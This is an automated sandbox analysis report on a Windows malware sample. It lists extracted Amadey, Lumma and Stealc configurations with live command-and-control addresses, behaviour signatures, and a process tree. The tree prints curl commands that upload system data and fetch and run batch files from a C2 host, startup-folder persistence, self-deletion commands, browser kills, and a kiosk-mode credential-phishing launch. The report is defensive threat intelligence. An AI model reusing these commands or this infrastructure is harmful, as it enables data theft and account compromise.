Analysis

  • max time kernel
    142s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-12-2024 09:20

General

  • Target

    e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe

  • Size

    3.0MB

  • MD5

    d6759f231670dd66b95e2cf066d7e066

  • SHA1

    08f13e2e757a55936174d6a596a6d9c8fab41831

  • SHA256

    e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292

  • SHA512

    eee5f50336e71511cf5380c78c302405e355ac021757dcff08fbdf76a29dd4e0cfd5bba36e74ab7ae0fe63e60adb111b5d6437ed4525d5aa90878088dac842c3

  • SSDEEP

    49152:e4qIJ9fsUujMFFzGT3ODQmwC1MdD/yb9edy:e4q0fsUujMF9G7p/C1MdD/q

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

C2

https://sordid-snaked.cyou/api

https://awake-weaves.cyou/api

https://wrathful-jammy.cyou/api

https://debonairnukk.xyz/api

https://diffuculttan.xyz/api

https://effecterectz.xyz/api

https://deafeninggeh.biz/api

https://immureprech.biz/api

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://drive-connect.cyou/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://immureprech.biz/api

https://deafeninggeh.biz/api

https://drive-connect.cyou/api

https://effecterectz.xyz/api

https://covery-mover.biz/api

https://diffuculttan.xyz/api

https://debonairnukk.xyz/api

https://wrathful-jammy.cyou/api

https://awake-weaves.cyou/api

https://sordid-snaked.cyou/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 5 IoCs
  • Executes dropped EXE 17 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 56 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 36 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe
    "C:\Users\Admin\AppData\Local\Temp\e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2380
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2300
      • C:\Users\Admin\AppData\Local\Temp\1014031001\IGEaNGi.exe
        "C:\Users\Admin\AppData\Local\Temp\1014031001\IGEaNGi.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5092
        • C:\Users\Admin\AppData\Local\Temp\1014031001\IGEaNGi.exe
          "C:\Users\Admin\AppData\Local\Temp\1014031001\IGEaNGi.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2952
      • C:\Users\Admin\AppData\Local\Temp\1014060001\76fae8d626.exe
        "C:\Users\Admin\AppData\Local\Temp\1014060001\76fae8d626.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2256
        • C:\Users\Admin\AppData\Local\Temp\1014060001\76fae8d626.exe
          "C:\Users\Admin\AppData\Local\Temp\1014060001\76fae8d626.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2008
      • C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe
        "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:4176
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4620
          • C:\Windows\SysWOW64\systeminfo.exe
            systeminfo
            5⤵
            • System Location Discovery: System Language Discovery
            • Gathers system information
            PID:4628
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:3224
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4128
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3384
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
          4⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          PID:2144
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5092
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2324
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3864
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:6048
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
          4⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          PID:6068
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5292
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1100
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5312
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5724
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
          4⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          PID:5784
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5920
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3708
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1252
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5256
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
          4⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          PID:3560
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2460
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5504
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5536
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5048
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
          4⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          PID:1500
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4644
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
          4⤵
          • System Location Discovery: System Language Discovery
          PID:6120
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:812
      • C:\Users\Admin\AppData\Local\Temp\1014321001\TdDkUco.exe
        "C:\Users\Admin\AppData\Local\Temp\1014321001\TdDkUco.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:944
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1014321001\TdDkUco.exe" & rd /s /q "C:\ProgramData\EUA1N7YM7GV3" & exit
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4392
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 10
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:1676
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 2096
          4⤵
          • Program crash
          PID:5088
      • C:\Users\Admin\AppData\Local\Temp\1014323001\pcrndBC.exe
        "C:\Users\Admin\AppData\Local\Temp\1014323001\pcrndBC.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:1176
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1014323001\pcrndBC.exe" & rd /s /q "C:\ProgramData\4E37YCBIEU37" & exit
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1876
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 10
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:3156
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 1924
          4⤵
          • Program crash
          PID:2960
      • C:\Users\Admin\AppData\Local\Temp\1014335001\71fe6c16cb.exe
        "C:\Users\Admin\AppData\Local\Temp\1014335001\71fe6c16cb.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4628
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 652
          4⤵
          • Program crash
          PID:2072
      • C:\Users\Admin\AppData\Local\Temp\1014336001\c56caa7321.exe
        "C:\Users\Admin\AppData\Local\Temp\1014336001\c56caa7321.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:4848
        • C:\Users\Admin\AppData\Local\Temp\1014336001\c56caa7321.exe
          "C:\Users\Admin\AppData\Local\Temp\1014336001\c56caa7321.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2336
      • C:\Users\Admin\AppData\Local\Temp\1014337001\e5779c09bf.exe
        "C:\Users\Admin\AppData\Local\Temp\1014337001\e5779c09bf.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2356
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1912
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2924
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2780
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3312
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4932
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
            PID:3800
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
              5⤵
              • Checks processor information in registry
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              PID:3936
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1944 -prefMapHandle 1936 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {454e0996-3b1f-4cd0-9549-d7fb065671f7} 3936 "\\.\pipe\gecko-crash-server-pipe.3936" gpu
                6⤵
                  PID:3656
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2444 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {30e373f0-7840-443e-9591-41f1d8189a28} 3936 "\\.\pipe\gecko-crash-server-pipe.3936" socket
                  6⤵
                    PID:4632
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3040 -childID 1 -isForBrowser -prefsHandle 3148 -prefMapHandle 2912 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9831a753-bd7c-4690-9a3a-96e8bbe8a227} 3936 "\\.\pipe\gecko-crash-server-pipe.3936" tab
                    6⤵
                      PID:3132
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3972 -childID 2 -isForBrowser -prefsHandle 3956 -prefMapHandle 3952 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {110d6d04-dec9-4419-a44b-dbada57f00f5} 3936 "\\.\pipe\gecko-crash-server-pipe.3936" tab
                      6⤵
                        PID:2256
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4896 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4860 -prefMapHandle 4396 -prefsLen 29197 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9dc04160-26a2-4c50-9c9d-640a6e1f7c4c} 3936 "\\.\pipe\gecko-crash-server-pipe.3936" utility
                        6⤵
                        • Checks processor information in registry
                        PID:5764
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5380 -childID 3 -isForBrowser -prefsHandle 5428 -prefMapHandle 5432 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8a5c04c-a691-45ad-a6ef-11931bb28d96} 3936 "\\.\pipe\gecko-crash-server-pipe.3936" tab
                        6⤵
                          PID:2188
                        • C:\Program Files\Mozilla Firefox\firefox.exe
